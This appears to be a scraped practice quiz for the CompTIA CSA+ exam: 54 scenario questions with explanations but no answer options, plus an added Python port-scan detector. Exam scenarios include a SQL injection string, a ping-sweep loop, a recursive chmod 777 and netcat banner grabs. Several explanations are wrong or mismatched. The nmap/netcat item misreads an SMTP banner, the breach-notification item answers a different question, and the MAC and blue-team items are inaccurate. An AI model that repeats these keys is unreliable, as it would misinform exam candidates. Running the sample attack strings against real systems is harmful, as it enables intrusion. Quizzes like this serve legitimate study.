CSA+

By Heavenlymixed86
Questions: 142
1. An analyst is observing unusual network traffic from a workstation. The workstation is communicating with a known malicious site over an encrypted tunnel. A full antivirus scan with an updated antivirus signature file does not show any sign of infection. Which of the following has occurred on the workstation?

Explanation

The correct answer is a zero-day attack. A zero-day attack refers to a cyber attack that exploits a previously unknown vulnerability in a computer application or system. In this scenario, the analyst is observing unusual network traffic from a workstation that is communicating with a known malicious site over an encrypted tunnel. Despite conducting a full antivirus scan with updated antivirus signatures, no signs of infection are found. This suggests that the attack is leveraging a vulnerability that is not yet known to the antivirus software, hence it is a zero-day attack.

About This Quiz

The CSA+ quiz assesses knowledge in cybersecurity, focusing on attack detection, system security, and preventive measures. It tests skills like traffic analysis, separation of duties, log management, and secure access, crucial for IT security professionals.

2. Which of the following is MOST effective for log-based correlation analysis for threat management?

Explanation

SIEM (Security Information and Event Management) is the most effective option for correlation analysis by log for threat management. SIEM systems collect and analyze log data from various sources, such as network devices, servers, and applications, to identify and correlate security events. By analyzing log data, SIEM can detect patterns and anomalies that may indicate potential threats or security incidents. This helps organizations in threat management by providing real-time monitoring, alerting, and incident response capabilities. PACP (Passive Asset Categorization Protocol), SCAP (Security Content Automation Protocol), and IPS (Intrusion Prevention System) are not specifically designed for correlation analysis by log for threat management.

3. The director of software development is concerned with recent web application security incidents, including the successful breach of a back-end database server. The director would like to work with the security team to implement a standardized way to design, build, and test web applications and the services that support them. Which of the following meets these criteria?

Explanation

OWASP (Open Web Application Security Project) is the correct answer because it is an organization that provides resources, tools, and guidelines for web application security. The director's concern with recent security incidents aligns with OWASP's mission to improve the security of web applications. By working with the security team to implement OWASP's standardized design, build, and testing practices, the director can ensure that web applications and their supporting services are developed with security in mind. SANS is also a reputable organization that focuses on cybersecurity, but it does not specifically specialize in web application security like OWASP does. PHP and Ajax are programming languages and technologies, not comprehensive frameworks or guidelines for web application security.

4. After analyzing and correlating activity from multiple sensors, the security analyst has determined that a group from a high-risk country is responsible for a sophisticated breach of the company network and continuous administration of targeted attacks for the past three months. Until now, the attacks went unnoticed. This is an example of:

Explanation

The given scenario describes a situation where a security analyst has analyzed and correlated activity from multiple sensors and determined that a group from a high-risk country has successfully breached the company network and conducted targeted attacks for a prolonged period without being detected. This aligns with the characteristics of an advanced persistent threat (APT), which refers to a long-term, sophisticated attack by a skilled and persistent adversary. The fact that the attacks went unnoticed for three months further supports the idea of an APT, as they often employ stealthy tactics to evade detection.

5. The director of software development is concerned with recent web application security incidents, including the successful breach of a back-end database server. The director would like to work with the security team to implement a standardized way to design, build, and test web applications and the services that support them. Which of the following meets these criteria?

Explanation

OWASP (Open Web Application Security Project) is the correct answer. OWASP provides a set of guidelines, tools, and resources for web application security. By working with the security team to implement OWASP, the director of software development can ensure that web applications and services are designed, built, and tested in a standardized and secure manner. OWASP focuses on identifying and mitigating common web application vulnerabilities, making it an appropriate choice for addressing the concerns raised by recent security incidents. SANS is a well-known organization that offers cybersecurity training and certifications, but it does not specifically focus on web application security. PHP and Ajax are programming languages and technologies, not comprehensive frameworks or guidelines for web application security.

6. Which of the following commands would a security analyst use to make a copy of an image for forensics use?

Explanation

A security analyst would use the "dd" command to make a copy of an image for forensic use. The "dd" command is commonly used on Linux systems to create a bit-by-bit copy of a file or device. It can be used to clone disks, create disk images, or make backups. By using "dd", the security analyst can ensure that all data, including hidden or deleted information, is preserved in the copy, making it suitable for forensic analysis.

7. As part of an upcoming engagement for a client, an analyst is configuring a penetration testing application to ensure the scan complies with the information defined in the SOW. Which of the following types of information should be considered, based on what is traditionally found in a SOW? (Select two.)

Explanation

Based on what is traditionally found in a SOW (Statement of Work), the timing of the scan and excluded hosts are two types of information that should be considered when configuring a penetration testing application. The timing of the scan is important to ensure that it aligns with the client's schedule and does not disrupt their operations. Excluded hosts are also crucial, as they specify which systems should not be scanned during the testing process, such as critical infrastructure or sensitive systems that could be negatively impacted.

8. An administrator has been investigating the way in which an actor has been exfiltrating confidential data from a web server to a foreign host. After a thorough review, the administrator determined the server's BIOS had been modified by a rootkit installation. After removing the rootkit and flashing the BIOS to a known good state, which of the following would BEST protect against future adversary access to the BIOS, in case another rootkit is installed?

Explanation

TPM (Trusted Platform Module) data sealing would be the best choice to protect against future adversary access to the BIOS. A TPM is a hardware chip that securely stores cryptographic keys and provides secure storage and processing of sensitive information. Data sealing ensures that the data can only be accessed by the authorized system and cannot be tampered with. By sealing the BIOS data using the TPM, even if another rootkit is installed, it would not be able to modify the BIOS without the authorized system's authentication. This provides a strong defense against future attacks on the BIOS.

9. Management is concerned with administrator access from outside the network to a key server in the company. Specifically, firewall rules allow access to the server anywhere in the company. Which of the following would be an effective solution?

Explanation

A jump box is a secure computer that serves as an intermediary between external networks and the key server. It acts as a single access point for administrators, allowing them to connect to the jump box first and then access the key server. This setup adds an extra layer of security by reducing direct access to the key server from outside the network. It also allows for better monitoring and control over administrator access, as all connections are funneled through the jump box.

10. An administrator has been investigating the way in which an actor had been exfiltrating confidential data from a web server to a foreign host. After a thorough forensic review, the administrator determined the server's BIOS had been modified by a rootkit installation. After removing the rootkit and flashing the BIOS to a known good state, which of the following would BEST protect against adversary access to the BIOS, in case another rootkit is installed?

Explanation

TPM (Trusted Platform Module) data sealing would best protect against adversary access to the BIOS in case another rootkit is installed. TPM is a hardware-based security feature that stores cryptographic keys and provides secure storage and processing of sensitive information. By sealing the data with TPM, it ensures that the data can only be accessed or decrypted on the same system with the same TPM, preventing unauthorized access even if a rootkit is installed. Anti-malware applications, host-based IDS, and file integrity monitoring are important security measures but may not provide the same level of protection as TPM data sealing in this scenario.

11. The Chief Information Security Officer (CISO) has asked the security staff to identify a framework on which to base the security program. The CISO would like to achieve a certification showing the security program meets all the required best practices. Which of the following would be the BEST choice?

Explanation

ISO (International Organization for Standardization) would be the best choice for the CISO to base the security program on and achieve a certification showing that it meets all the required best practices. ISO provides internationally recognized standards for various aspects of business operations, including information security. By adopting ISO standards, the security program can ensure that it follows a comprehensive and systematic approach to managing information security risks, thereby demonstrating its commitment to best practices and compliance with industry standards.

12. A security analyst has determined that the user interface on an embedded device is vulnerable to common SQL injections. The device cannot be replaced, and the software cannot be upgraded. Which of the following should the security analyst recommend to add additional security to this device?

Explanation

Placing the device behind a Web Application Firewall (WAF) is the best recommendation to enhance security. A WAF can inspect and filter incoming traffic, detecting and blocking common SQL injection attacks before they reach the vulnerable user interface. It acts as a protective shield, preventing unauthorized access and reducing the risk of successful attacks. This solution is particularly useful when the device cannot be replaced or upgraded, as it adds an additional layer of security without requiring any changes to the device itself.

13. A company has recently launched a new billing invoice website for a few key vendors. The cybersecurity analyst is receiving calls that the website is performing slowly and the pages sometimes time out. The analyst notices the website is receiving millions of requests, causing the services to become unavailable. Which of the following can be implemented to maintain the availability of the website?

Explanation

Whitelisting can be implemented to maintain the availability of the website. By using whitelisting, the cybersecurity analyst can create a list of trusted IP addresses or domains that are allowed to access the website. This will block any unauthorized requests from reaching the website, reducing the load on the server and preventing it from becoming unavailable. Whitelisting ensures that only legitimate traffic is allowed, mitigating the impact of the millions of requests and improving the website's performance and availability.

14. A blue team hunted for and identified a previously unknown malicious binary, whose behavior they would like to analyze. When performing this analysis, the use of which of the following would provide the BEST protection against further downstream infection of assets?

Explanation

Sandboxing would provide the best protection against further downstream infection of assets. Sandboxing involves running the malicious binary in a controlled environment, isolating it from the rest of the system. This prevents any potential harm or infection from spreading to other assets. By containing the binary within the sandbox, the blue team can analyze its behavior without risking the security of other assets on the network.

15. A cybersecurity analyst traced the source of an attack to compromised user credentials. Log analysis revealed that the attacker successfully authenticated from an unauthorized foreign country. Management asked the security analyst to research and implement a solution to help mitigate attacks based on compromised passwords. Which of the following should the analyst implement?

Explanation

Context-based authentication should be implemented to help mitigate attacks based on compromised passwords. This type of authentication takes into account various contextual factors such as the user's location, device, and behavior patterns to determine if the login attempt is legitimate. By analyzing these factors, the system can detect suspicious activity, such as authentication from an unauthorized foreign country in this case, and prompt for additional verification or deny access altogether. This helps to enhance the security of the authentication process and prevent unauthorized access even if the attacker has compromised valid user credentials.

16. A cybersecurity analyst is conducting a security test to ensure that information regarding the web server is protected from disclosure. The cybersecurity analyst requested an HTML file from the web server, and the response came back as follows:

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Tues, 19 Apr 2016 09:32:24 GMT
Content-Type: text/html
Content-Length: 111

<html><head><title>Site Not Found</title></head>
<body> No web site is configured at this address. </body></html>

Which of the following actions should be taken to remediate this security issue?

Explanation

The correct action to remediate this security issue is to set "RemoveServerHeader" to 1 in the URLScan.ini configuration file. This removes the Server header from the response, which helps prevent potential attackers from learning the web server's software and version and from targeting its known vulnerabilities.

17. A recent vulnerability scan found four vulnerabilities on an organization's public Internet-facing IP addresses. Prioritizing in order to reduce the risk of a breach to the organization, which of the following should be remediated FIRST?

Explanation

The buffer overflow that allows remote code execution should be remediated first because it poses the highest risk to the organization. A buffer overflow vulnerability can be exploited by an attacker to execute arbitrary code on the system, potentially gaining unauthorized access and control. This type of vulnerability is highly dangerous as it can lead to complete compromise of the system and sensitive data. Therefore, addressing this vulnerability promptly is crucial to minimize the risk of a breach.

18. During a routine review of firewall logs, an analyst identified that an address from the organization's server subnet had been connecting during nighttime hours to a foreign IP address and had been sending between 150 and 500 megabytes of data each time. This had been going on for approximately one week, and the affected server was taken offline for forensic review. Which of the following is MOST likely to drive up the incident's impact assessment?

Explanation

The exfiltration of PII (Personally Identifiable Information) of company employees and customers is likely to drive up the incident's impact assessment. PII includes sensitive data such as names, addresses, social security numbers, and financial information. The unauthorized access and exfiltration of this data can lead to severe consequences, including identity theft, financial loss, and reputational damage for both the organization and the individuals affected. It would require extensive mitigation efforts, legal obligations, and potential financial liabilities to address the breach and protect the affected individuals.

19. A recent audit has uncovered several coding errors and a lack of input validation being used on a public portal. Due to the nature of the portal and the severity of the errors, the portal is unable to be patched. Which of the following tools could be used to reduce the risk of being compromised?

Explanation

A web application firewall can be used to reduce the risk of being compromised in this scenario. A web application firewall is specifically designed to protect web applications from common attacks such as SQL injection, cross-site scripting, and other vulnerabilities. Since the audit has uncovered coding errors and a lack of input validation on the public portal, a web application firewall can help mitigate these risks by monitoring and filtering incoming and outgoing traffic to the application, blocking any malicious requests or attempts to exploit the vulnerabilities. This can help protect the portal and its users from potential attacks.

20. A cybersecurity analyst has received a report that multiple systems are experiencing slowness as a result of a DDoS attack. Which of the following would be the BEST action for the cybersecurity analyst to perform?

Explanation

The best action for the cybersecurity analyst to perform in this scenario is to inform management of the incident. By doing so, management can be made aware of the ongoing DDoS attack and can take appropriate actions to mitigate the attack and minimize its impact on the systems. This allows for a coordinated response and ensures that the necessary resources and measures are put in place to address the issue effectively.

21. While a threat intelligence analyst was researching an indicator of compromise on a search engine, the web proxy generated an alert on the same indicator. The threat analyst states that the related sites were not visited but were only searched for in a search engine. Which of the following MOST likely happened in this situation?

Explanation

The correct answer is "The analyst has prefetch enabled on the browser in use." This means that the browser is preloading web pages in the background based on the analyst's search queries, even if the analyst did not actually visit those sites. This prefetching feature could have triggered the alert from the web proxy.

22. During the post-seizure analysis of a workstation, the technician discovers a large archive on an image that the forensic tool suite is unable to access. The technician is prompted for authorization credentials when attempting to open the files manually. Which of the following tools would be MOST appropriate to use on the archive to gain access?

Explanation

A password cracker would be the most appropriate tool to use on the archive in order to gain access. Since the technician is prompted for authorization credentials when attempting to open the files manually, it suggests that the archive is password protected. A password cracker is designed to systematically attempt different combinations of passwords until the correct one is found, allowing the technician to gain access to the files within the archive.

23. A system administrator has reviewed the following output:

# nmap server.local
Nmap scan report for server.local
Host is up (0.3452345s latency)
Not shown: 997 closed ports
PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  open   http
# nc server.local 80
220 server.local company SMTP server (postfix/2.3.3)
# nc server.local 22
SSH-2.0-OpenSSH_7.1p2 Debian-2
#

Which of the following can the system administrator infer from the above output?

Explanation

The output shows that port 22 (SSH) and port 80 (HTTP) are open, but there is no mention of the email server running on any port. Therefore, the system administrator cannot infer anything about the company email server from this output.

24. A security analyst has been asked to remediate a server vulnerability. Once the analyst has located a patch for the vulnerability, which of the following should happen NEXT?

Explanation

After locating a patch for the vulnerability, the next step should be to start the change control process. This process ensures that any changes made to the server, in this case, the implementation of the patch, are properly documented, reviewed, and approved. It helps maintain the integrity and stability of the system by ensuring that changes are made in a controlled and organized manner, minimizing the risk of introducing new vulnerabilities or causing disruptions.

25. File integrity monitoring states that the following files have been changed. The following change has been made:

chmod 777 -Rv /usr

Which of the following may be occurring?

Explanation

The correct answer is that administrative commands have been made world readable/writable. This is indicated by the command "chmod 777 -Rv /usr", which recursively changes the permissions of the /usr directory tree to allow read, write, and execute access for all users. By making the administrative commands world readable/writable, any user can potentially modify or execute these commands, which poses a security risk.

26. A cybersecurity analyst has identified a new mission-essential function that utilizes a public cloud-based system. The analyst needs to classify the information processed by the system with respect to the CIA. Which of the following should provide the CIA classification for the information?

Explanation

The data owner should provide the CIA classification for the information because they are responsible for determining the sensitivity and importance of the data. They have the knowledge and authority to classify the information based on its confidentiality, integrity, and availability requirements. The data owner can assess the potential risks and impact of unauthorized access, modification, or loss of the data and make informed decisions regarding its classification.

27. Nmap scan results on a set of IP addresses returned one or more lines beginning with "cpe:/o:" followed by a company name, product name, and version. Which of the following would this string help an administrator identify?

Explanation

The string "cpe:/o:" followed by a company name, product name, and version indicates the operating systems installed on the scanned IP addresses. This information can help an administrator identify the specific operating systems being used by the devices on the network.

28. An executive tasked a security analyst to aggregate past logs, traffic, and alerts on a particular vector. The analyst was then tasked with analyzing the data and making predictions on future complications regarding this attack vector. Which of the following types of analysis is the security analyst MOST likely conducting?

Explanation

The security analyst is most likely conducting trend analysis. Trend analysis involves analyzing past data and identifying patterns or trends to make predictions about future outcomes. In this case, the analyst is aggregating past logs, traffic, and alerts on a specific attack vector and using that data to predict future complications related to that vector. This aligns with the concept of trend analysis, which focuses on identifying and analyzing patterns over time to make informed predictions.

29. An organization wants to harden its web servers. As part of this goal, leadership has directed that a vulnerability scan be performed and that the security team remediate the servers according to industry best practices. The team has already chosen a vulnerability scanner and performed the necessary scan, and now the team needs to prioritize the fixes. Which of the following would help to prioritize the vulnerabilities for remediation in accordance with industry best practices?

Explanation

CVSS (Common Vulnerability Scoring System) is a widely recognized industry standard for assessing and prioritizing vulnerabilities. It provides a numerical score to each vulnerability based on its severity, impact, and exploitability. By using CVSS, the security team can prioritize the fixes based on the highest-scoring vulnerabilities, ensuring that the most critical issues are addressed first. This approach aligns with industry best practices and helps the organization effectively remediate the vulnerabilities on its web servers.

30. A technician is running an intensive vulnerability scan to detect which ports are open to exploit. During the scan, several network resources are disabled and production is affected. Which of the following sources would be used to evaluate which network service was interrupted?

Explanation

Syslog is a standard protocol used for sending and receiving log messages in a network. It is commonly used to collect and store log data from various devices, including network devices and servers. In this scenario, when the technician is running the vulnerability scan and network resources are disabled, syslog can be used to evaluate which network service was interrupted. It can provide information about the events and activities happening in the network, including any errors or disruptions that occurred during the scan. By analyzing the syslog data, the technician can identify the specific network service that was affected and take appropriate actions to resolve the issue.

31. Which of the following BEST describes the offensive participants in a tabletop exercise?

Explanation

A tabletop exercise is a simulation of a real-life scenario where participants play different roles to test and improve their response to a potential incident. The offensive participants in a tabletop exercise are commonly referred to as the "Red team." Their role is to act as the attackers, attempting to exploit vulnerabilities and breach the system's security. The Red team's objective is to identify weaknesses in the system and provide valuable insights into potential threats and vulnerabilities. They help organizations assess their security measures and develop effective strategies to enhance their overall defense capabilities.

32. An HR employee began having issues with a device becoming unresponsive after attempting to open an e-mail attachment. When informed, the security analyst became suspicious of the situation, even though there was no unusual behavior on the IDS or any alert from the antivirus software. Which of the following BEST describes the type of threat in this situation?

Explanation

In this situation, the HR employee experienced issues with a device becoming unresponsive after attempting to open an email attachment. The security analyst became suspicious because there was no unusual behavior on the IDS or any alert from the antivirus software. This suggests that the threat is zero-day malware, which refers to malicious software that exploits vulnerabilities in software or systems that are unknown to the software developers or the security community. Since there were no prior alerts or detections for this malware, it falls under the category of a zero-day threat.

33. A security analyst is creating baseline system images to remediate vulnerabilities found in different operating systems. Each image needs to be scanned before it is deployed. The security analyst must ensure the configurations match industry standard benchmarks and that the process can be repeated frequently. Which of the following vulnerability options would BEST meet the process requirements?

Explanation

Utilizing an operating system SCAP plugin would be the best option to create the process requirements. SCAP (Security Content Automation Protocol) is a standardized method for assessing and managing the security configuration of computer systems. By using an operating system SCAP plugin, the security analyst can ensure that the system configurations match industry standard benchmarks. Additionally, the process can be repeated frequently to continuously monitor and remediate vulnerabilities in the system images. This option provides a comprehensive and efficient approach to scanning and remediating vulnerabilities in different operating systems.

34. A threat intelligence feed has posted an alert stating there is a critical vulnerability in the kernel. Unfortunately, the company's asset inventory is not current. Which of the following techniques would a cybersecurity analyst perform to find all affected servers within an organization?

Explanation

An OS fingerprinting scan across all hosts would be performed by a cybersecurity analyst to find all affected servers within an organization. OS fingerprinting is a technique used to identify the operating system running on a particular device by analyzing its network behavior and characteristics. By conducting an OS fingerprinting scan across all hosts, the analyst can identify the operating systems of the servers and determine if they are vulnerable to the critical vulnerability in the kernel mentioned in the threat intelligence feed. This scan helps in identifying the affected servers and taking appropriate actions to mitigate the vulnerability.

35. A small bank employs an administrator who manages configurations, performs updates to servers, creates accounts, and reviews audit logs. The bank recently received a write-up from a third-party security assessment attributed to this administrator's job duties. The insufficiency of which of the following controls was MOST likely to have caused the citation?

Explanation

The insufficiency of separation of duties was most likely to have caused the citation. Separation of duties is a control measure that ensures that no single individual has complete control over a process or system. In this case, the administrator is responsible for multiple tasks such as managing configurations, performing updates, creating accounts, and reviewing audit logs. Without proper separation of duties, there is a higher risk of fraud, errors, and unauthorized activities going undetected. The third-party security assessment likely identified this lack of control as a potential vulnerability in the bank's security measures.

36. A system administrator who was using an account with elevated privileges deleted a large number of log files generated by a virtual hypervisor in order to free up disk space. These logs are needed by the security team to analyze the health of the virtual machines. Which of the following compensating controls would help prevent this from reoccurring? (Select TWO)

Explanation

Separation of duties would help prevent this from reoccurring by ensuring that the system administrator with elevated privileges does not have the ability to delete log files. Personnel training would also help by educating the system administrator on the importance of the log files and the potential consequences of deleting them.

37. A company that is hiring a penetration tester wants to exclude social engineering from the list of authorized activities. Which of the following documents should include these details?

Explanation

The "Rules of engagement" document should include the details of excluding social engineering from the list of authorized activities. This document outlines the scope, objectives, and limitations of the penetration testing engagement. It specifies what actions are allowed and what are not allowed during the testing process. By including the exclusion of social engineering in the "Rules of engagement," the company clearly communicates its expectations to the penetration tester and ensures that they adhere to the desired testing boundaries.

38. Which of the following are essential components within the rules of engagement for a penetration test? (Select TWO)

Explanation

The schedule is an essential component within the rules of engagement for a penetration test because it outlines the timeframe in which the test will be conducted, ensuring that it is conducted within a specified time period. Authorization is also essential as it ensures that the penetration test is conducted with proper permission from the organization, ensuring legal and ethical compliance. The other options, such as the list of system administrators, payment terms, and business justification, are not directly related to the rules of engagement for a penetration test.

39. An organization has recently recovered from an incident where a managed switch had been accessed and reconfigured without authorization by an insider. The incident response team is working on developing a lessons learned report with recommendations. Which of the following recommendations would be BEST to prevent the same attack from occurring in the future?

Explanation

Implementing a separate logical network segment for management interfaces would be the best recommendation to prevent the same attack from occurring in the future. This would ensure that the management interfaces are isolated from the rest of the network, making it more difficult for unauthorized access and configuration changes to occur. By separating the management interfaces, any potential insider threat would have limited access and would not be able to easily compromise the switch. This recommendation would enhance the security of the network and prevent similar incidents from happening again.

40. A security analyst wants to scan the network for active hosts. Which of the following characteristics can help to differentiate between a virtual and physical host?

Explanation

Reserved MACs can help differentiate between a virtual and physical host. In virtual environments, MAC addresses are often generated dynamically, whereas physical hosts typically have fixed, reserved MAC addresses assigned to their network interface cards (NICs). By examining the MAC addresses of the hosts on the network, the security analyst can identify those with reserved MACs as physical hosts, while hosts with dynamically generated MACs are likely to be virtual machines.

41. Which of the following is a feature of virtualization that can potentially create a single point of failure?

Explanation

Server consolidation is a feature of virtualization that can potentially create a single point of failure. When multiple servers are consolidated onto a single physical server, a failure of that server results in the failure of all the consolidated servers. This is because all the virtual machines are running on the same physical hardware, and if that hardware fails, it can lead to a complete system outage. Therefore, server consolidation can introduce a single point of failure in virtualized environments.

42. A security audit revealed that port 389 has been used instead of 636 when connecting to LDAP for the authentication of users. The remediation recommended by the audit was to switch the port to 636 whenever technically possible. Which of the following is the BEST response?

Explanation

The correct answer is to change all devices and servers that support it to port 636 because encrypted services run by default on this port. This ensures that the authentication of users is done securely and reduces the risk of unauthorized access or data breaches. Using port 636 also aligns with the recommended remediation from the security audit, which aims to improve the overall security posture of the system.

43. A cybersecurity analyst has several log files to review. Instead of using grep and cat commands, the analyst decides to find a better approach to analyze the logs. Given the list of tools, which of the following would provide a more efficient way for the analyst to conduct a timeline analysis, do keyword searches, and produce output?

Explanation

Splunk would provide a more efficient way for the analyst to conduct a timeline analysis, do keyword searches, and output. Splunk is a powerful log management and analysis tool that allows the analyst to easily search, analyze, and visualize log data from various sources. It provides advanced search capabilities, real-time monitoring, and customizable dashboards, making it an ideal choice for efficiently analyzing log files.

44. A security analyst is reviewing IDS logs and notices the following entry:

(where [email protected] and passwords=' or 20==20')

Which of the following attacks is occurring?

Explanation

The given entry in the IDS logs indicates a SQL injection attack. In this attack, the attacker is attempting to exploit a vulnerability in the system by manipulating the SQL query. The use of the "or 20==20" statement in the passwords field suggests that the attacker is trying to bypass the authentication mechanism by injecting a condition that always evaluates to true. This type of attack can allow the attacker to gain unauthorized access to the database and potentially extract or modify sensitive information.

45. A reverse engineer was analyzing malware found on a retailer's network and found code extracting data in memory. Which of the following threats did the engineer MOST likely uncover?

Explanation

The reverse engineer most likely uncovered POS malware. POS malware refers to malicious software that is specifically designed to target point-of-sale systems, such as those used by retailers. This type of malware is used to steal sensitive data, such as credit card information, from the retailer's network. The fact that the engineer found code extracting data in memory suggests that the malware was specifically designed to target and extract information from the point-of-sale system.

46. A software patch has been released to remove vulnerabilities from company software. A security analyst has been tasked with testing the software to ensure the vulnerabilities have been remediated and the application is still functioning properly. Which of the following tests should be performed NEXT?

Explanation

Regression testing should be performed next. Regression testing is a type of software testing that is conducted to ensure that changes or fixes made to the software have not introduced new defects or caused any existing functionality to break. In this case, since a software patch has been released to remove vulnerabilities, regression testing would help verify that the vulnerabilities have indeed been remediated and that the application is still functioning properly after the patch has been applied.

47. A cybersecurity analyst has received the laptop of a user who recently left the company. The analyst types into the prompt and sees this line of code in the latest bash history:

for i in $(seq 255); do ping -c 1 192.168.0.$i; done

This concerns the analyst because the subnet should not be known to users within the company. Which of the following describes what this code has done on the network?

Explanation

The code in the bash history has performed a ping sweep of a class C network. This means that it has sent ping packets to each host within the network range in order to determine which hosts are active and responsive. This information could be used for various purposes, such as identifying potential vulnerabilities or mapping out the network topology.

48. As part of the SDLC, software developers are testing the security of a new web application by inputting large amounts of random data. Which of the following types of testing is being performed?

Explanation

The correct answer is fuzzing. Fuzzing is a type of testing where software developers input large amounts of random data into a system to test its security. This is done to identify vulnerabilities and potential issues in the application. Fuzzing helps to uncover unexpected behavior and can be an effective technique for finding security flaws in software.

49. A technician is running an intensive vulnerability scan to detect which ports are open to exploit. During the scan, network services are disabled and production is affected. Which of the following sources would be used to evaluate which network service was interrupted?

Explanation

Syslog is a protocol used for collecting and sending system log messages. It can provide valuable information about events and activities happening on a network. In this scenario, when network services are disabled and production is affected during the vulnerability scan, syslog can be used to evaluate which network service was interrupted. Syslog messages can help identify any errors or disruptions that occurred during the scan, allowing the technician to pinpoint the specific network service that was affected.

50. Which of the following best practices is used to identify areas in the network that may be vulnerable to penetration testing from external sources?

Explanation

Blue team training exercises are used to identify areas in the network that may be vulnerable to penetration testing from external sources. These exercises involve simulating real-world cyber attacks on the network to test its defenses and identify potential weaknesses. By conducting these exercises, the blue team can assess the effectiveness of their security measures and identify areas that need improvement or further protection. This helps in proactively addressing vulnerabilities and enhancing the overall security posture of the network.

51. After running a packet analyzer on the network, a security analyst has noticed the following output:

11:52:04 10.10.10.65.39769 > 192.168.50.147.80: S 2585925862:2585925862(0) win 4096 (ttl 29, id 48666)
11:52:04 10.10.10.65.39769 > 192.168.50.147.81: S 2585925862:2585925862(0) win 4096 (ttl 29, id 65179)
11:52:04 10.10.10.65.39769 > 192.168.50.147.83: S 2585925862:2585925862(0) win 4096 (ttl 29, id 42056)
11:52:04 10.10.10.65.39769 > 192.168.50.147.82: S 2585925862:2585925862(0) win 4096 (ttl 29, id 41568)

Which of the following is occurring?

Explanation

The given output shows multiple packets being sent from the source IP address 10.10.10.65 to the destination IP address 192.168.50.147 on different ports (80, 81, 83, and 82). The fact that the destination ports are different suggests that the attacker is trying to scan for open ports on the target system. This is a characteristic behavior of a port scan, where an attacker systematically scans a range of ports on a target system to identify potential vulnerabilities or services running on those ports. Therefore, the correct answer is a port scan.
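An added example, not part of the original quiz, of how a defender turns the reasoning above into detection logic: it parses tcpdump-style lines of the form shown in the question, groups SYN-only packets by source and destination address, and flags a source that probes several distinct destination ports within a short window. The threshold and window are assumptions, and the capture lines are a constructed sample copied in form from the question.

```python
"""Detect a TCP SYN port scan in tcpdump-style capture lines.

Added example (not from the quiz). The threshold (min_ports) and the time
window are assumptions chosen for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, copied in form from the question's packet analyzer output.
CAPTURE = """\
11:52:04 10.10.10.65.39769 > 192.168.50.147.80: S 2585925862:2585925862(0) win 4096 (ttl 29, id 48666)
11:52:04 10.10.10.65.39769 > 192.168.50.147.81: S 2585925862:2585925862(0) win 4096 (ttl 29, id 65179)
11:52:04 10.10.10.65.39769 > 192.168.50.147.83: S 2585925862:2585925862(0) win 4096 (ttl 29, id 42056)
11:52:04 10.10.10.65.39769 > 192.168.50.147.82: S 2585925862:2585925862(0) win 4096 (ttl 29, id 41568)
"""

# One line: time  src.port > dst.port: FLAGS seq:seq(len) win N ...
LINE_RE = re.compile(
    r"^(?P<time>\d{2}:\d{2}:\d{2})\s+"
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+)\s+>\s+"
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+):\s+"
    r"(?P<flags>[SFRPU.]+)\s+(?P<seq>\d+):\d+\(\d+\)\s+win\s+(?P<win>\d+)"
)


def parse_packets(text):
    """Return one dict per parseable capture line; other lines are skipped."""
    packets = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a TCP packet summary
        p = m.groupdict()
        p["time"] = datetime.strptime(p["time"], "%H:%M:%S")
        for key in ("sport", "dport", "seq", "win"):
            p[key] = int(p[key])
        packets.append(p)
    return packets


def detect_port_scans(packets, min_ports=3, window=timedelta(seconds=5)):
    """Flag (src, dst) pairs whose SYN-only packets reach >= min_ports distinct
    destination ports inside `window`. Returns {(src, dst): sorted ports}."""
    syns = defaultdict(list)
    for p in packets:
        if p["flags"] == "S":  # SYN without ACK: a new connection attempt
            syns[(p["src"], p["dst"])].append(p)
    findings = {}
    for pair, pkts in syns.items():
        pkts.sort(key=lambda p: p["time"])
        hit = set()
        start = 0
        for end in range(len(pkts)):  # sliding time window over the SYNs
            while pkts[end]["time"] - pkts[start]["time"] > window:
                start += 1
            ports = {p["dport"] for p in pkts[start:end + 1]}
            if len(ports) >= min_ports:
                hit |= ports
        if hit:
            findings[pair] = sorted(hit)
    return findings


def scanner_fingerprint(packets):
    """True when every SYN reuses one source port and one sequence number.
    A normal TCP stack picks a fresh ephemeral port and ISN per connection,
    so this pattern points at crafted packets rather than real clients."""
    syns = [p for p in packets if p["flags"] == "S"]
    return len(syns) > 1 and len({(p["sport"], p["seq"]) for p in syns}) == 1


if __name__ == "__main__":
    pkts = parse_packets(CAPTURE)
    for (src, dst), ports in detect_port_scans(pkts).items():
        print(f"port scan: {src} -> {dst} ports {ports}")
    print("crafted packets (fixed source port and ISN):", scanner_fingerprint(pkts))
```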

52. A vulnerability scan has returned the following information:

Detailed Results
10.10.10.214 (LOTUS-10-214)
Windows Shares
Category: Windows
CVE ID: -
Vendor Ref: -
Bugtraq ID: -
Service Modified: 4.16.2014
Enumeration Results:
print$ C:\windows\system32\spool\drivers
ofscan C:\Program Files\Trend Micro\OfficeScan\PCCSRV
Temp C:\temp

Which of the following describes the meaning of these results?

Explanation

The vulnerability scan results indicate that by connecting to the host using a null session, it is possible to enumerate the share names. This means that an attacker can gain access to the shared files and folders on the Windows server (LOTUS-10-214) without providing any authentication credentials. This vulnerability should be addressed and mitigated to prevent unauthorized access to sensitive information.

53. A security analyst is adding input to the incident response communication plan. A company officer has suggested that if a data breach occurs, only affected parties should be notified to keep an incident from becoming a media headline. Which of the following should the analyst recommend to the company officer?

Explanation

The analyst should recommend that the first responder contacts law enforcement upon confirmation of a security incident to preserve the chain of custody for forensic purposes. This is important because law enforcement agencies have the expertise and resources to properly handle and investigate security incidents. By involving law enforcement, the company can ensure that any evidence collected will be admissible in court if necessary. Preserving the chain of custody is crucial to maintain the integrity and credibility of the evidence, which is essential for a successful investigation and potential legal proceedings.

54. A security analyst is performing a review of Active Directory and discovers two new user accounts in the accounting department. Neither of the users has elevated permissions, but accounts in the group are given access to the company's sensitive financial management application by default. Which of the following is the BEST course of action?

Explanation

The best course of action in this scenario is to confirm the validity of the newly discovered user accounts and ensure that their role-based permissions are appropriate. This is important because the accounts have access to the company's sensitive financial management application by default, even though they do not have elevated permissions. By confirming their validity and reviewing their permissions, the security analyst can ensure that only authorized individuals have access to sensitive information and prevent any potential security breaches or unauthorized access.

